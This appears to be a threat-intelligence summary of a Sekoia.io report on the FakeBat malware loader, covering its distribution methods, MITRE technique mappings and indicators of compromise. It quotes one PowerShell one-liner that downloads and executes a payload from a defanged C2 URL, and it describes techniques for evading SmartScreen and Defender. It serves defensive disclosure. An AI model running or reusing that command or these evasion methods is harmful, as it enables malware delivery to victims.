Sekoia.io reports that FakeBat operates as Malware-as-a-Service, distributing MSIX/MSI loaders via drive-by downloads, malvertising, and fake browser updates across multiple campaigns during 2023–2024. Operators (including Eugenfest and Payk_34) provide an administration panel to build, manage, and monitor payloads and increasingly evolved anti-detection and distribution techniques to sustain MaaS services. #FakeBat #EugenFest
Keypoints
- FakeBat (aka EugenLoader, PaykLoader) was one of the most widespread loaders using drive-by download techniques in 2024.
- Threat actors sell FakeBat as Loader-as-a-Service on cybercrime forums, offering an admin panel to generate builds, manage payloads, and monitor installations.
- Second wave advertising introduced MSIX as a new format and added valid digital signatures to bypass Microsoft SmartScreen and Defender alerts.
- FakeBat distribution clusters rely on malvertising, software impersonation landing pages, fake browser updates, and social engineering on social networks.
- FakeBat operators provide an associated distribution service (Pay-Per-Install style) to deliver payloads on behalf of customers and monetize installations.
- TDR tracks a rotating C2 infrastructure, thousands of compromised/controlled domains, and domain hosting patterns to monitor FakeBat activity and evolution.
MITRE Techniques
- [T1189] Drive-by Compromise – Drive-by download technique to distribute malware via user web browsing. Quote: ‘drive-by download technique to distribute malware via user web browsing. This technique mostly involves SEO-poisoning, malvertising, and code injection into compromised websites to trick users into downloading fake software installers or browser updates.’
- [T1059.001] PowerShell – Initial PowerShell script downloads and executes the next-stage payload from the C2 server. Quote: ‘&{$zqpl=’hxxps://utr-krubz[.]com/buy/’;$zqplii=’lkmns32Sf3lkn’;$iiii=(iwr -Uri $zqpl -UserAgent $zqplii -UseBasicParsing).Content; iex $iiii}’
- [T1082] System Information Discovery – The initial PowerShell script fingerprints the infected host (and exfiltrates data) as part of the later C2 communication. Quote: ‘fingerprinted the infected host and exfiltrated the data through its C2 servers to the URL endpoint…’
- [T1071.001] Web Protocols – C2 communications and payload delivery via HTTP(S) endpoints; data exfiltration to C2. Quote: ‘exfiltrated the data through its C2 servers to the URL endpoint av, domain, key, site, status and os.’
- [T1027] Masquerading – Digital signatures added to FakeBat installers in MSIX format to defeat security prompts. Quote: ‘added a digital signature to the FakeBat installer with a valid certificate.’
- [T1562.001] Impair Defenses – Bypassing Google Unwanted Software Policy and Windows Defender alerts (and being protected from VirusTotal). Quote: ‘bypassing the Unwanted Software Policy of Google and Windows Defender alerts and being protected from VirusTotal’.
Indicators of Compromise
- [Domain] 0212top.online, 0212top.site – FakeBat C2 hosting domains used in Aug–Dec 2023 (and related clusters).
- [Domain] utr-krubz[.]com, monkeybeta[.]com – C2/infrastructure domains observed in distribution campaigns.
- [IP] 62.204.41.98 – All domains in a set were hosted on this IP from Dec 2023 to Jun 2024.
- [Hash] c336d98d8d4810666ee4693e8c3a2a34191bad864d6b46e468a7eed36e7085f4 – MSIX file hash.
- [Hash] 7265ffdbe31dd96d6e6c8ead5a56817c905ff012418546e2233b7dce22372630 – MSIX file hash.
- [Hash] 9aa39f017b50dcc2214ce472d3967721c676a7826030c2e34cb95c495dba4960 – MSIX file hash.
- [File] Getmess.msix – Malicious package used in social-engineering/distribution campaigns (web3 cluster).
- [File] iiU.ps1 (iiu.ps1) – Initial PowerShell script filename used in FakeBat campaigns.
Read more: https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/